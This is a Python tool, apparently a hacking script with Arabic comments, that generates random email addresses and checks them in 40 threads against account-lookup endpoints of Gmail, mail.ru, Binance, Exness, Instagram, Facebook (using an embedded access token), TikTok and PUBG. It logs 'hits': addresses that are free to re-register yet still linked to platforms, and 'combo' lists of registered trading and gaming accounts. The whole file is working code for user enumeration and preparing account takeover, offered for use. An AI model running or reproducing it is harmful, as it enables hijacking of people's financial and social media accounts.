import os, sys, time, requests, json, random, threading, string, subprocess, re
from datetime import datetime

def setup_env():
    pkgs = ['cloudscraper', 'python-cfonts', 'colorama', 'beautifulsoup4', 'requests']
    for p in pkgs:
        try: __import__(p)
        except ImportError: subprocess.check_call([sys.executable, "-m", "pip", "install", p])

setup_env()
from cfonts import render
from colorama import Fore, Style, init
init(autoreset=True)

F, Z, X, B, M, S, W, G = Fore.GREEN, Fore.RED, Fore.YELLOW, Fore.BLUE, Fore.MAGENTA, Fore.CYAN, Fore.WHITE, Fore.LIGHTBLACK_EX
HITS_FILE = "Gimlaamm.txt"
RECREATE_FILE = "re-create_hits.txt"

hits, bad, checked, banned = 0, 0, 0, 0
stop_thread = False

BROWSER_DB = [
    "Mozilla/5.0 (Linux; Android 11; OPPO A16k Build/RP1A.200720.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Mobile Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 17_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1",
    "Mozilla/5.0 (Linux; Android 13; SM-S908B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Mobile Safari/537.36"
]

def logo():
    print(render('MOHA-02', colors=['green', 'yellow'], align='center'))
    print(f"{X}—"*55)
    print(f"{F} [•] DEVELOPER : Moha Al-Shalfawi (@m_oha_02)")
    print(f"{F} [•] VERSION   : 7.0 (ULTIMATE POWER)")
    print(f"{F} [•] ENGINE    : TRADING + GAMING + SOCIAL")
    print(f"{X}—"*55)

class Checkers:
    @staticmethod
    def get_h(m="web"):
        ua = random.choice(BROWSER_DB)
        h = {'User-Agent': ua, 'Accept': '*/*', 'Connection': 'keep-alive'}
        if m == "insta": h.update({'X-IG-App-ID': '936619743392459', 'X-Requested-With': 'XMLHttpRequest'})
        return h

    @staticmethod
    def check_gmail_advanced(email):
        try:
            r = requests.get(f"https://mail.google.com/mail/gxlu?email={email}", headers=Checkers.get_h(), timeout=12)
            if r.status_code == 429: return "BANNED"
            if 'set-cookie' in r.headers:
                if 'COMPASS' not in str(r.headers): return True
            return False
        except: return "ERROR"

    @staticmethod
    def check_mail_ru(email):
        try:
            r = requests.get(f"https://account.mail.ru/api/v1/user/exists?email={email}", headers=Checkers.get_h(), timeout=10)
            return '"exists":false' in r.text
        except: return False

    @staticmethod
    def check_binance(email):
        try:
            r = requests.post("https://www.binance.com/bapi/accounts/v1/public/account/check-email", json={"email": email}, headers=Checkers.get_h(), timeout=8)
            return r.json().get('data') == True
        except: return False

    @staticmethod
    def check_exness(email):
        try:
            r = requests.post("https://my.exness.com/api/external/v1/check-email", json={"email": email}, headers=Checkers.get_h(), timeout=8)
            return r.json().get('exists') == True
        except: return False

    @staticmethod
    def check_instagram(email):
        try:
            r = requests.post("https://www.instagram.com/api/v1/web/accounts/lookup_edit/", headers=Checkers.get_h("insta"), data={'email': email}, timeout=8)
            return '"status":"ok"' in r.text
        except: return False

    @staticmethod
    def check_facebook(email):
        try:
            r = requests.get(f"https://b-graph.facebook.com/recover_accounts?q={email}&access_token=350685531728|62f8ce9f74b12f84c123cc23437a4a32", timeout=8)
            return "network_info" in r.text
        except: return False

    @staticmethod
    def check_tiktok(email):
        try:
            r = requests.get(f"https://www.tiktok.com/api/v1/check/email/?email={email}&aid=1233", timeout=8)
            return r.json().get('is_registered') == 1
        except: return False

    @staticmethod
    def check_pubg(email):
        try:
            r = requests.get(f"https://www.pubgmobile.com/id/event/p_code/check?email={email}", headers=Checkers.get_h(), timeout=8)
            return '"msg":"ok"' in r.text
        except: return False

    @staticmethod
    def get_all_linked(email):
        linked = []
        if Checkers.check_binance(email): linked.append("Binance")
        if Checkers.check_exness(email): linked.append("Exness")
        if Checkers.check_facebook(email): linked.append("Facebook")
        if Checkers.check_instagram(email): linked.append("Instagram")
        if Checkers.check_tiktok(email): linked.append("TikTok")
        if Checkers.check_pubg(email): linked.append("PUBG")
        return linked

class Generator:
    @staticmethod
    def create_user(prefix, length):
        chars = string.ascii_lowercase + string.digits
        if not length or length == 0: length = random.randint(7, 10)
        if not prefix: return ''.join(random.choice(chars) for _ in range(length))
        if len(prefix) >= length: return prefix
        needed = length - len(prefix)
        return prefix + ''.join(random.choice(chars) for _ in range(needed))

def save_data(file, data):
    with open(file, "a", encoding="utf-8") as f:
        f.write(data + "\n")
def hunter_engine_v7(mode, prefix, length, domains):
    global hits, bad, checked, banned, stop_thread
    
    # محرك الصيد المزدوج
    while not stop_thread:
        try:
            # 1. توليد اليوزر (أحرف + أرقام)
            user = Generator.create_user(prefix, length)
            for dom in domains:
                if stop_thread: break
                email = f"{user}@{dom}"
                checked += 1
                
                # تحديث سطر الحالة الذكي (تخمين مستمر في سطر واحد)
                # هذا السطر يمنع الفراغات ويجعلك ترى العمل في الخلفية
                status = f"{W} [{checked}] {G}SCANNING: {S}{email} {W}| {F}HITS: {hits} {W}| {Z}BANNED: {banned}"
                sys.stdout.write(f"\r{status}")
                sys.stdout.flush()

                # --- الخيار الأول: متاح للإنشاء ومرتبط ---
                if mode == "1":
                    status_gmail = Checkers.check_gmail_advanced(email)
                    if status_gmail == "BANNED":
                        banned += 1
                        continue
                    elif status_gmail == True:
                        # فحص كافة المنصات إذا كان البريد متاحاً
                        platforms = Checkers.get_all_linked(email)
                        if platforms:
                            hits += 1
                            # طباعة الصيد في سطر جديد تماماً كما في صورتك
                            print(f"\n{F}[HIT] {hits} - AVAILABLE: {W}{email} {F}→ {X}{' + '.join(platforms)}")
                            save_data(RECREATE_FILE, f"[HIT] {email} | Platforms: {' + '.join(platforms)}")
                    else:
                        bad += 1

                # --- الخيار الثاني: مسجل ومرتبط (كومبو) ---
                elif mode == "2":
                    platforms = Checkers.get_all_linked(email)
                    if platforms:
                        hits += 1
                        # طباعة الكومبو في سطر جديد مع كافة المنصات
                        print(f"\n{S}[COMBO] {hits} - HIT: {W}{email} {S}→ {M}{' + '.join(platforms)}")
                        save_data(HITS_FILE, f"{email} | Platforms: {' + '.join(platforms)}")
                    else:
                        bad += 1
            
            # سرعة التنفيذ
            time.sleep(0.001)
        except Exception as e:
            continue

def start_v7_session(mode):
    global stop_thread, hits, bad, checked, banned
    
    print(f"\n{X} [!] CHOOSE DOMAIN TYPE:")
    print(f"{G} [1] gmail.com")
    print(f"{G} [2] mail.ru (bk.ru, list.ru, inbox.ru)")
    print(f"{G} [3] hi2.in")
    print(f"{G} [4] ALL IN ONE (MIXED SCAN)")
    
    d_choice = input(f"{M} [?] YOUR SELECTION: ")
    
    dom_map = {
        '1': ['gmail.com'],
        '2': ['mail.ru', 'bk.ru', 'list.ru', 'inbox.ru'],
        '3': ['hi2.in'],
        '4': ['gmail.com', 'mail.ru', 'hi2.in', 'hotmail.com', 'outlook.com', 'yahoo.com']
    }
    targets = dom_map.get(d_choice, ['gmail.com'])

    pre = input(f"{M} [?] INITIAL PREFIX (Name): ")
    ln = input(f"{M} [?] TOTAL LENGTH (Ex: 8): ")
    length = int(ln) if ln.isdigit() else 0
    
    # إعادة ضبط العدادات لجلسة جديدة
    hits, bad, checked, banned = 0, 0, 0, 0
    stop_thread = False
    
    print(f"\n{X}—"*55)
    print(f"{F} [!] LAUNCHING 40 PRO-THREADS... NO DATA WILL BE DELETED.")
    print(f"{W} [!] TARGETS: BINANCE, EXNESS, FB, IG, TIKTOK, PUBG")
    print(f"{X}—"*55 + "\n")

    # توزيع المهام على 40 خيط لضمان القوة القصوى
    threads_list = []
    for _ in range(40):
        t = threading.Thread(target=hunter_engine_v7, args=(mode, pre, length, targets))
        t.daemon = True
        t.start()
        threads_list.append(t)
    
    # انتظار المستخدم للإيقاف والعودة للمنيو
    try:
        input(f"\n{W} [*] SYSTEM ACTIVE. PRESS [ENTER] TO STOP HUNTING.\n")
    except EOFError: pass
    
    stop_thread = True
    print(f"\n{Z} [!] STOPPING THREADS... PLEASE WAIT.")
    time.sleep(2)
def main_menu_v7():
    # التأكد من ثبات الملفات عند التشغيل
    for f in [HITS_FILE, RECREATE_FILE]:
        if not os.path.exists(f): 
            with open(f, "a") as setup_file: pass
            
    while True:
        os.system('clear') # تنظيف الشاشة عند العودة للمنيو فقط
        logo() # Developer: Moha Al-Shalfawi (@m_oha_02)
        
        # عرض إحصائيات سريعة من الملفات
        try:
            with open(HITS_FILE, "r") as f: combo_total = len(f.readlines())
            with open(RECREATE_FILE, "r") as f: rec_total = len(f.readlines())
        except: combo_total, rec_total = 0, 0

        print(f"{S} [01] RE-CREATE MODE {G}(Available + Linked Platforms)")
        print(f"{S} [02] COMBO GENERATOR {G}(Registered + Trading/Gaming)")
        print(f"{S} [03] SHOW RE-CREATE HISTORY {G}(Hits: {rec_total})")
        print(f"{S} [04] SHOW COMBO HISTORY {G}(Hits: {combo_total})")
        print(f"{S} [05] CLEAR CACHE & TERMINAL")
        print(f"{Z} [00] EXIT SYSTEM")
        print(f"{X}—"*55)
        print(f"{W} [!] ENGINE STATUS: {F}ACTIVE {W}| {X}TRADING: ON {W}| {B}GAMING: ON")
        print(f"{X}—"*55)
        
        opt = input(f"{M} [?] SELECT OPTION: ")
        
        if opt in ['01', '1']:
            start_v7_session("1")
        elif opt in ['02', '2']:
            start_v7_session("2")
        elif opt in ['03', '3']:
            display_saved_hits(RECREATE_FILE)
        elif opt in ['04', '4']:
            display_saved_hits(HITS_FILE)
        elif opt in ['05', '5']:
            os.system('clear')
        elif opt in ['00', '0']:
            print(f"\n{Z} [!] SHUTTING DOWN... HAPPY HUNTING MOCHA!"); sys.exit()

def display_saved_hits(file_path):
    # عرض النتائج بطريقة منظمة لسهولة النسخ
    print(f"\n{F} [★] ACCESSING FILE: {file_path}")
    print(f"{W}—"*55)
    if os.path.exists(file_path):
        with open(file_path, "r", encoding="utf-8") as f:
            lines = f.readlines()
            if not lines:
                print(f"{Z} [!] No hits found yet.")
            else:
                # عرض آخر 30 صيدة لضمان عدم امتلاء الشاشة
                for i, line in enumerate(lines[-30:], 1):
                    print(f"{W}  [{i:02}] {line.strip()}")
    else:
        print(f"{Z} [!] File does not exist.")
    
    print(f"{W}—"*55)
    input(f"\n{X} [!] PRESS ENTER TO RETURN TO MAIN MENU...")

def global_exception_handler():
    # نظام حماية لمنع توقف الأداة المفاجئ
    if __name__ == "__main__":
        try:
            main_menu_v7()
        except KeyboardInterrupt:
            print(f"\n{Z} [!] PROCESS INTERRUPTED BY USER.")
            sys.exit()
        except requests.exceptions.ConnectionError:
            print(f"\n{Z} [!] CONNECTION LOST! CHECK YOUR INTERNET.")
            time.sleep(3)
            main_menu_v7()
        except Exception as e:
            # تسجيل الخطأ والاستمرار لضمان عدم الضياع
            print(f"\n{Z} [!] CRITICAL ERROR: {e}")
            with open("error_log.txt", "a") as err_log:
                err_log.write(f"{datetime.now()} : {str(e)}\n")
            time.sleep(5)
            main_menu_v7()

# تشغيل النظام النهائي
global_exception_handler()
